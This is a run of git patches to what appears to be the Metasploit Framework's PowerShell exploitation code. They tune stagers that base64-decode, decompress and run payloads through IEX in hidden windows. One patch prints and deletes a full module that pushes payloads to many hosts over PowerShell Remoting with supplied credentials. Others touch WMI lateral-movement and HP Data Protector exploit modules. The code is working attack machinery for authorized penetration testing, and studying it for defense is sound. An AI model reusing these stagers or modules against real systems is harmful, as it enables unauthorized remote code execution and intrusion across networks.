       @code = code
       populate_params
     end
+
     def to_s
       "function #{name} #{code}"
     end
@@ -420,10 +418,6 @@ module Powershell
                    :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
                    :end_with?
 
-    # def method_missing(meth, *args, &block)
-    #   code.send(meth,*args,&block) || (raise NoMethodError.new, meth)
-    # end
-
     def initialize(code)
       @code = ''
       begin
@@ -447,50 +441,6 @@ module Powershell
     # Class methods
     ##
 
-
-    def self.psp_funcs(dir)
-      scripts = Dir.glob(File.expand_path(dir) + '/**/*').select {|e| e =~ /ps1$|psm1$/}
-      functions = scripts.map {|s| puts s; Script.new(s).functions}
-      return functions.flatten
-    end
-
-    #
-    # Return list of code modifier methods
-    #
-    def self.code_modifiers
-      self.instance_methods.select {|m| m =~ /^(strip|sub)/}
-    end
-  end # class Script
-
-  ##
-  # Convenience methods
-  ##
-  
-  module PshMethods
-
-    #
-    # Download file to host via PSH
-    #
-    def self.download(src,target=nil)
-      target ||= '$pwd\\' << src.split('/').last
-      return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
-    end
-
-    #
-    # Uninstall app
-    #
-    def self.uninstall(app,fuzzy=true)
-      match = fuzzy ? '-like' : '-eq'
-      return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
-    end
-
-    #
-    # Create secure string from plaintext
-    #
-    def self.secure_string(str)
-      return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
-    end
-
     #
     # Convert binary to byte array, read from file if able
     #
@@ -510,15 +460,58 @@ module Powershell
       return psh << lines.join("") + "\r\n"
     end
 
+    def self.psp_funcs(dir)
+      scripts = Dir.glob(File.expand_path(dir) + '/**/*').select {|e| e =~ /ps1$|psm1$/}
+      functions = scripts.map {|s| puts s; Script.new(s).functions}
+      return functions.flatten
+    end
+
     #
-    # Find PID of file locker
+    # Return list of code modifier methods
+    #
+    def self.code_modifiers
+      self.instance_methods.select {|m| m =~ /^(strip|sub)/}
+    end
+  end # class Script
+
+  ##
+  # Convenience methods for generating powershell code in Ruby
+  ##
+  
+  module PshMethods
+
+    #
+    # Download file via .NET WebClient
+    #
+    def self.download(src,target=nil)
+      target ||= '$pwd\\' << src.split('/').last
+      return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
+    end
+
+    #
+    # Uninstall app, or anything named like app
+    #
+    def self.uninstall(app,fuzzy=true)
+      match = fuzzy ? '-like' : '-eq'
+      return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
+    end
+
+    #
+    # Create secure string from plaintext
+    #
+    def self.secure_string(str)
+      return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
+    end
+
+    #
+    # Find PID of file lock owner
     #
     def self.who_locked_file?(filename)
       return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
     end
 
     #
-    # Return last time of login for each user
+    # Return last time of login
     #
     def self.get_last_login(user)
       return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^

From 270b4b9728293a7247f221cf8bf0f92e29e6760a Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 19 Apr 2014 18:54:42 +0100
Subject: [PATCH 073/321] Catch first arg with shorten

---
 lib/msf/core/exploit/powershell.rb | 23 +++++++++++++----------
 1 file changed, 13 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 2e3a320827..6bc4e75cb9 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -163,18 +163,21 @@ module Exploit::Powershell
 
     # Shorten arg if PSH 2.0+
     if opts[:shorten]
+      # Invoke-Command and Out-File require these options to have
+      # an additional space before to prevent Powershell code being
+      # mangled.
       arg_string.gsub!(' -Command ', ' -c ')
-      arg_string.gsub!(' -EncodedCommand ', ' -e ')
-      arg_string.gsub!(' -ExecutionPolicy ', ' -ep ')
+      arg_string.gsub!('-EncodedCommand ', ' -e ')
+      arg_string.gsub!('-ExecutionPolicy ', ' -ep ')
       arg_string.gsub!(' -File ', ' -f ')
-      arg_string.gsub!(' -InputFormat ', ' -i ')
-      arg_string.gsub!(' -NoExit ', ' -noe ')
-      arg_string.gsub!(' -NoLogo ', ' -nol ')
-      arg_string.gsub!(' -NoProfile ', ' -nop ')
-      arg_string.gsub!(' -NonInteractive ', ' -noni ')
-      arg_string.gsub!(' -OutputFormat ', ' -o ')
-      arg_string.gsub!(' -Sta ', ' -s ')
-      arg_string.gsub!(' -WindowStyle ', ' -w ')
+      arg_string.gsub!('-InputFormat ', ' -i ')
+      arg_string.gsub!('-NoExit ', ' -noe ')
+      arg_string.gsub!('-NoLogo ', ' -nol ')
+      arg_string.gsub!('-NoProfile ', ' -nop ')
+      arg_string.gsub!('-NonInteractive ', ' -noni ')
+      arg_string.gsub!('-OutputFormat ', ' -o ')
+      arg_string.gsub!('-Sta ', ' -s ')
+      arg_string.gsub!('-WindowStyle ', ' -w ')
     end
 
     #Strip off first space character

From c936dc963cccaa83d93becc269743c8eb18beb77 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 19 Apr 2014 18:55:45 +0100
Subject: [PATCH 074/321] Shorten compression

---
 lib/rex/exploitation/powershell.rb | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 2b03e99632..b97761ddf1 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -45,8 +45,8 @@ module Powershell
       psh_expression =  "$s=New-Object IO.MemoryStream(,"
       psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
       # Read & delete the first two bytes due to incompatibility with MS
-      psh_expression << "$stream.ReadByte()|Out-Null;"
-      psh_expression << "$stream.ReadByte()|Out-Null;"
+      psh_expression << "$s.ReadByte()|Out-Null;"
+      psh_expression << "$s.ReadByte()|Out-Null;"
       # Uncompress and invoke the expression (execute)
       psh_expression << "$(IEX $(New-Object IO.StreamReader("
       psh_expression << "$(New-Object IO.Compression.DeflateStream("
@@ -81,12 +81,12 @@ module Powershell
 
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
-      psh_expression =  "$stream = New-Object IO.MemoryStream(,"
+      psh_expression =  "$s=New-Object IO.MemoryStream(,"
       psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
       # Uncompress and invoke the expression (execute)
-      psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
+      psh_expression << "$(IEX $(New-Object IO.StreamReader("
       psh_expression << "$(New-Object IO.Compression.GzipStream("
-      psh_expression << "$stream,"
+      psh_expression << "$s,"
       psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
       psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
 

From 0f942d8c3d47ded78147709c73e20396b470b5a7 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 19 Apr 2014 18:58:26 +0100
Subject: [PATCH 075/321] Still :shorten command args

---
 lib/msf/core/exploit/powershell.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 6bc4e75cb9..29ed0c7982 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -197,7 +197,6 @@ module Exploit::Powershell
     arg_opts = {
         :noprofile => true,
         :windowstyle => 'hidden',
-        :shorten => false
     }
 
     if encoded

From 00234aeec3f95f6acc9ddd050cd02f52a17d6aa9 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 19 Apr 2014 19:03:18 +0100
Subject: [PATCH 076/321] Remove powershell remoting

---
 .../windows/local/powershell_remoting.rb      | 154 ------------------
 1 file changed, 154 deletions(-)
 delete mode 100644 modules/exploits/windows/local/powershell_remoting.rb

diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb
deleted file mode 100644
index 622cecd1c5..0000000000
--- a/modules/exploits/windows/local/powershell_remoting.rb
+++ /dev/null
@@ -1,154 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-require 'rex'
-
-class Metasploit3 < Msf::Exploit::Local
-  Rank = ExcellentRanking
-
-  include Msf::Exploit::Powershell
-
-  def initialize(info={})
-    super( update_info( info,
-        'Name'          => 'Powershell Remoting Remote Command Execution',
-        'Description'   => %q{
-          Uses Powershell Remoting (TCP 47001) to inject payloads on target machines.
-        If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise
-        use a HOSTFILE to supply a list of known hostnames.
-        },
-        'License'       => MSF_LICENSE,
-        'Author'        => [
-            'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
-          ],
-        'References'    =>
-          [
-            [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
-            [ 'OSVDB', '3106'],
-          ],
-        'DefaultOptions' =>
-            {
-                'EXITFUNC' => 'thread',
-            },
-        'DisclosureDate' => 'Jan 01 1999',
-        'Platform'      => [ 'win' ],
-        'SessionTypes'  => [ 'meterpreter', 'shell' ],
-        'Targets' =>
-        [
-            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
-        ],
-        'DefaultTarget' => 0
-      ))
-
-    register_options([
-      OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
-      OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
-      OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication' ]),
-      OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
-      OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]),
-      # Move this out of advanced
-      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
-      OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ]),
-    ])
-
-    register_advanced_options(
-      [
-        OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60])
-      ], self.class)
-  end
-
-  def exploit
-    if not datastore['ExitOnSession'] and not job_id
-      fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
-    end
-
-    unless datastore['RHOSTS'] || datastore['HOSTFILE']
-      fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.")
-    end
-
-    if datastore['SMBUser'] and datastore['SMBPass'].nil?
-      fail_with(Failure::BadConfig, "Need both username and password set.")
-    end
-
-    if datastore['RHOSTS']
-      ip_list = "$iplist="
-      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip|
-        ip_list << "'#{ip}',"
-      end
-
-      # Remove trailing comma...
-      ip_list = ip_list[0..-2]
-      ip_list << ";"
-    end
-
-    known_hosts = ""
-    if datastore['HOSTFILE']
-      ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname|
-        hostname.strip!
-        known_hosts << "'#{hostname}'," unless hostname.blank?
-      end
-      known_hosts = known_hosts[0..-2]
-    end
-
-    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { :encode_final_payload => true, :remove_comspec => true })
-
-    ps =<<EOF
-#{generate_credentials}
-$ResultList=@(#{known_hosts});
-#{ip_list}
-foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
-Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} }
-EOF
-
-    if datastore['SMBUser']
-      ps << " -Credential $creds"
-    end
-
-    # If the host process terminates too quickly the jobs will die
-    # before they spawn in a new process.
-    ps << ";Sleep 20;"
-    ps.gsub!("\n","")
-
-    command = generate_psh_command_line({
-      :noprofile => true,
-      :windowstyle => 'hidden',
-      :command => ps,
-    })
-
-    print_status("Executing command...")
-    begin
-      cmd_exec(command)
-    rescue Rex::TimeoutError
-    end
-
-    stime = Time.now.to_f
-    while(true)
-      break if session_created? and datastore['ExitOnSession']
-      break if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) )
-
-      Rex.sleep(1)
-    end
-  end
-
-  def generate_credentials(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
-    creds = ""
-
-    unless user.nil?
-      creds = "$pass=ConvertTo-SecureString -string #{pass} -asPlainText -force;"\
-      "$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist "
-      if domain.nil?
-        creds << "'#{user}'"
-      else
-        creds << "'#{domain}\\#{user}'"
-      end
-
-      creds << ",$pass;"
-    end
-
-    return creds
-  end
-
-end
-

From 3019cb99c1ce13bcbfc360690e4ac663fea268ad Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 19 Apr 2014 19:13:48 +0100
Subject: [PATCH 077/321] Update cmd_upgrade module

---
 modules/exploits/windows/local/powershell_cmd_upgrade.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/powershell_cmd_upgrade.rb b/modules/exploits/windows/local/powershell_cmd_upgrade.rb
index 5b46139a50..d72baa6166 100644
--- a/modules/exploits/windows/local/powershell_cmd_upgrade.rb
+++ b/modules/exploits/windows/local/powershell_cmd_upgrade.rb
@@ -40,7 +40,8 @@ class Metasploit3 < Msf::Exploit::Local
 
     if file? "%WINDIR%\\System32#{psh_path}"
       print_status("Executing powershell command line...")
-      cmd_exec(cmd_psh_payload(payload.encoded))
+      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+      cmd_exec(command)
     else
       fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
     end

From 5d9bc71e973d8305f7ea6facf6acc804ffa07b6b Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 19 Apr 2014 19:16:17 +0100
Subject: [PATCH 078/321] Update hp_dataprotector

---
 modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb
index b0e0256094..0ae9fb1217 100644
--- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
       execute_cmdstager({:linemax => 7500})
     elsif target.name =~ /Powershell/
       # Environment variables are not being expanded before, neither in CreateProcess
-      command = cmd_psh_payload(payload.encoded).gsub(/%COMSPEC% /, "")
+      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
       if command.length > 8000
         # Windows 2008 Command Prompt Max Length is 8191
         fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")

From d73854ff1766594e91e84b63f020402fce5e2aa8 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 22 Apr 2014 14:28:27 +0100
Subject: [PATCH 079/321] Fix wmi and add automatic target

---
 modules/exploits/windows/local/wmi.rb | 30 ++++-----------------------
 1 file changed, 4 insertions(+), 26 deletions(-)

diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb
index 761b0d29d1..2968878862 100644
--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -49,10 +49,9 @@ class Metasploit3 < Msf::Exploit::Local
         'DisclosureDate' => 'Jan 01 1999',
         'Platform'      => [ 'win' ],
         'SessionTypes'  => [ 'meterpreter' ],
-        'Targets'	=>
+        'Targets'       =>
         [
-            [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
-            [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+            [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X86_64] } ],
         ],
         'DefaultTarget' => 0
       ))
@@ -127,29 +126,6 @@ class Metasploit3 < Msf::Exploit::Local
         print_error("[#{server}] failed...)")
       end
 
-      print_status("[#{server}] Cleaning up environment variables")
-      env_vars.each do |env|
-        cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
-        wmic_command(server, cleanup_cmd)
-      end
-    rescue Rex::Post::Meterpreter::RequestError => e
-      print_error("[#{server}] Error moving on... #{e}")
-      next
-    ensure
-        select(nil,nil,nil,2)
-    end
-  end
-  
-  def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
-    userpass = ""
-
-    unless user.nil?
-      if domain.nil?
-        userpass = "/user:\"#{user}\" /password:\"#{pass}\" "
-      else
-        userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "
-      end
-
       print_status("[#{server}] Cleaning up environment variables")
       env_vars.each do |env|
         cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
@@ -158,6 +134,8 @@ class Metasploit3 < Msf::Exploit::Local
     rescue Rex::Post::Meterpreter::RequestError => e
       print_error("[#{server}] Error moving on... #{e}")
       return false
+    ensure
+        Rex::sleep(2)
     end
   end
 

From 71b43d392b4241fab7a158a2237146430f3c1dfa Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 22 Apr 2014 14:36:02 +0100
Subject: [PATCH 080/321] Dont need to specify ASCII mode

---
 lib/rex/exploitation/powershell.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index b97761ddf1..d4b432eda7 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -51,8 +51,8 @@ module Powershell
       psh_expression << "$(IEX $(New-Object IO.StreamReader("
       psh_expression << "$(New-Object IO.Compression.DeflateStream("
       psh_expression << "$s,"
-      psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
-      psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
+      psh_expression << "[IO.Compression.CompressionMode]::Decompress))"
+      psh_expression << ")).ReadToEnd());"
 
       # If eof is set, add a marker to signify end of code output
       #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
@@ -87,8 +87,8 @@ module Powershell
       psh_expression << "$(IEX $(New-Object IO.StreamReader("
       psh_expression << "$(New-Object IO.Compression.GzipStream("
       psh_expression << "$s,"
-      psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
-      psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
+      psh_expression << "[IO.Compression.CompressionMode]::Decompress))"
+      psh_expression << ")).ReadToEnd());"
 
       # If eof is set, add a marker to signify end of code output
       #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end

From cec12edd99bf40dddd8d4d74ebfcab5d6e986c2e Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 22 Apr 2014 14:40:32 +0100
Subject: [PATCH 081/321] Use enum integer values

---
 lib/rex/exploitation/powershell.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index d4b432eda7..1d42a464bd 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -51,7 +51,8 @@ module Powershell
       psh_expression << "$(IEX $(New-Object IO.StreamReader("
       psh_expression << "$(New-Object IO.Compression.DeflateStream("
       psh_expression << "$s,"
-      psh_expression << "[IO.Compression.CompressionMode]::Decompress))"
+      # [IO.Compression.CompressionMode]::Decompress = 0
+      psh_expression << "0))"
       psh_expression << ")).ReadToEnd());"
 
       # If eof is set, add a marker to signify end of code output
@@ -87,7 +88,8 @@ module Powershell
       psh_expression << "$(IEX $(New-Object IO.StreamReader("
       psh_expression << "$(New-Object IO.Compression.GzipStream("
       psh_expression << "$s,"
-      psh_expression << "[IO.Compression.CompressionMode]::Decompress))"
+      # [IO.Compression.CompressionMode]::Decompress = 0
+      psh_expression << "0))"
       psh_expression << ")).ReadToEnd());"
 
       # If eof is set, add a marker to signify end of code output

From 354311d191c41cb248e572ff5ad347d78b465a5e Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 22 Apr 2014 14:42:03 +0100
Subject: [PATCH 082/321] No need to out-null if no windows is shown

---
 lib/rex/exploitation/powershell.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 1d42a464bd..afb9e7d588 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -45,8 +45,8 @@ module Powershell
       psh_expression =  "$s=New-Object IO.MemoryStream(,"
       psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
       # Read & delete the first two bytes due to incompatibility with MS
-      psh_expression << "$s.ReadByte()|Out-Null;"
-      psh_expression << "$s.ReadByte()|Out-Null;"
+      psh_expression << "$s.ReadByte();"
+      psh_expression << "$s.ReadByte();"
       # Uncompress and invoke the expression (execute)
       psh_expression << "$(IEX $(New-Object IO.StreamReader("
       psh_expression << "$(New-Object IO.Compression.DeflateStream("

From 4c66e86f7349ea80ac09ea91215e02d579a4eac6 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 22 Apr 2014 14:44:01 +0100
Subject: [PATCH 083/321] Dont add extra space in args

---
 lib/msf/core/exploit/powershell.rb | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 29ed0c7982..23a6813407 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -167,17 +167,17 @@ module Exploit::Powershell
       # an additional space before to prevent Powershell code being
       # mangled.
       arg_string.gsub!(' -Command ', ' -c ')
-      arg_string.gsub!('-EncodedCommand ', ' -e ')
-      arg_string.gsub!('-ExecutionPolicy ', ' -ep ')
+      arg_string.gsub!('-EncodedCommand ', '-e ')
+      arg_string.gsub!('-ExecutionPolicy ', '-ep ')
       arg_string.gsub!(' -File ', ' -f ')
-      arg_string.gsub!('-InputFormat ', ' -i ')
-      arg_string.gsub!('-NoExit ', ' -noe ')
-      arg_string.gsub!('-NoLogo ', ' -nol ')
-      arg_string.gsub!('-NoProfile ', ' -nop ')
-      arg_string.gsub!('-NonInteractive ', ' -noni ')
-      arg_string.gsub!('-OutputFormat ', ' -o ')
-      arg_string.gsub!('-Sta ', ' -s ')
-      arg_string.gsub!('-WindowStyle ', ' -w ')
+      arg_string.gsub!('-InputFormat ', '-i ')
+      arg_string.gsub!('-NoExit ', '-noe ')
+      arg_string.gsub!('-NoLogo ', '-nol ')
+      arg_string.gsub!('-NoProfile ', '-nop ')
+      arg_string.gsub!('-NonInteractive ', '-noni ')
+      arg_string.gsub!('-OutputFormat ', '-o ')
+      arg_string.gsub!('-Sta ', '-s ')
+      arg_string.gsub!('-WindowStyle ', '-w ')
     end
 
     #Strip off first space character

From 86cfecdd9500ae31eef843b429a72c12d5f7a681 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Tue, 22 Apr 2014 14:52:30 +0100
Subject: [PATCH 084/321] Shave some chars off compression code

---
 lib/rex/exploitation/powershell.rb | 20 ++++++++++----------
 1 file changed, 10 insertions(+), 10 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index afb9e7d588..8c3229e935 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -43,17 +43,17 @@ module Powershell
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
       psh_expression =  "$s=New-Object IO.MemoryStream(,"
-      psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+      psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
       # Read & delete the first two bytes due to incompatibility with MS
       psh_expression << "$s.ReadByte();"
       psh_expression << "$s.ReadByte();"
       # Uncompress and invoke the expression (execute)
-      psh_expression << "$(IEX $(New-Object IO.StreamReader("
-      psh_expression << "$(New-Object IO.Compression.DeflateStream("
+      psh_expression << "IEX (New-Object IO.StreamReader("
+      psh_expression << "New-Object IO.Compression.DeflateStream("
       psh_expression << "$s,"
       # [IO.Compression.CompressionMode]::Decompress = 0
-      psh_expression << "0))"
-      psh_expression << ")).ReadToEnd());"
+      psh_expression << "0)"
+      psh_expression << ")).ReadToEnd();"
 
       # If eof is set, add a marker to signify end of code output
       #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
@@ -83,14 +83,14 @@ module Powershell
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
       psh_expression =  "$s=New-Object IO.MemoryStream(,"
-      psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+      psh_expression << "[Convert]::FromBase64String('#{encoded_stream}'));"
       # Uncompress and invoke the expression (execute)
-      psh_expression << "$(IEX $(New-Object IO.StreamReader("
-      psh_expression << "$(New-Object IO.Compression.GzipStream("
+      psh_expression << "IEX (New-Object IO.StreamReader("
+      psh_expression << "New-Object IO.Compression.GzipStream("
       psh_expression << "$s,"
       # [IO.Compression.CompressionMode]::Decompress = 0
-      psh_expression << "0))"
-      psh_expression << ")).ReadToEnd());"
+      psh_expression << "0)"
+      psh_expression << ")).ReadToEnd();"
 
       # If eof is set, add a marker to signify end of code output
       #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end

From 88fe619c489197da4bcf4b65cb55e44f6be82571 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 00:15:12 +0100
Subject: [PATCH 085/321] Yarddoc exploit::powershell

---
 lib/msf/core/exploit/powershell.rb | 89 ++++++++++++++++++++++++++++--
 1 file changed, 83 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 23a6813407..1df7a59817 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -6,7 +6,6 @@ module Exploit::Powershell
 
   PowershellScript = Rex::Exploitation::Powershell::Script
 
-
   def initialize(info = {})
     super
     register_advanced_options(
@@ -29,6 +28,9 @@ module Exploit::Powershell
   #
   # Reads script into a PowershellScript
   #
+  # @param script_path [String] Path to the Script File
+  #
+  # @return [PowershellScript] PowerShellScript object
   def read_script(script_path)
     return PowershellScript.new(script_path)
   end
@@ -38,6 +40,10 @@ module Exploit::Powershell
   # If script is a path to a file then read the file
   # otherwise treat it as the contents of a file
   #
+  # @param script [String] Script file or path to script
+  # @param subs [Array] Substitutions to insert
+  #
+  # @return [String] Modified script file
   def make_subs(script, subs)
     if ::File.file?(script)
       script = ::File.read(script)
@@ -53,6 +59,9 @@ module Exploit::Powershell
   #
   # Return an array of substitutions for use in make_subs
   #
+  # @param subs [String] A ; seperated list of substitutions
+  #
+  # @return [Array] An array of substitutions
   def process_subs(subs)
     return [] if subs.nil? or subs.empty?
     new_subs = []
@@ -67,6 +76,10 @@ module Exploit::Powershell
   # Return an encoded powershell script
   # Will invoke PSH modifiers as enabled
   #
+  # @param script_in [String] Script contents
+  # @param eof [String] Marker to indicate the end of file appended to script
+  #
+  # @return [String] Encoded script
   def encode_script(script_in, eof = nil)
     # Build script object
     psh = PowershellScript.new(script_in)
@@ -83,6 +96,10 @@ module Exploit::Powershell
   # Return a gzip compressed powershell script
   # Will invoke PSH modifiers as enabled
   #
+  # @param script_in [String] Script contents
+  # @param eof [String] Marker to indicate the end of file appended to script
+  #
+  # @return [String] Compressed script with decompression stub
   def compress_script(script_in, eof = nil)
     # Build script object
     psh = PowershellScript.new(script_in)
@@ -96,8 +113,15 @@ module Exploit::Powershell
   end
 
   #
-  # Generate a powershell command line
+  # Generate a powershell command line, options are passed on to
+  # generate_psh_args
   #
+  # @param opts [Hash] The options to generate the command line
+  # @option opts [String] :path Path to the powershell binary
+  # @option opts [Boolean] :no_full_stop Whether powershell binary
+  #   should include .exe
+  #
+  # @return [String] Powershell command line with arguments
   def generate_psh_command_line(opts)
     if opts[:path] and (opts[:path][-1,1] != "\\")
       opts[:path] << "\\"
@@ -119,6 +143,32 @@ module Exploit::Powershell
   # The format will be have no space at the start and have a space
   # afterwards e.g. "-Arg1 x -Arg -Arg x "
   #
+  # @param opts [Hash] The options to generate the command line
+  # @option opts [Boolean] :shorten Whether to shorten the powershell
+  #   arguments (v2.0 or greater)
+  # @option opts [String] :encodedcommand Powershell script as an
+  #   encoded command (-EncodedCommand)
+  # @option opts [String] :executionpolicy The execution policy
+  #   (-ExecutionPolicy)
+  # @option opts [String] :inputformat The input format (-InputFormat)
+  # @option opts [String] :file The path to a powershell file (-File)
+  # @option opts [Boolean] :noexit Whether to exit powershell after
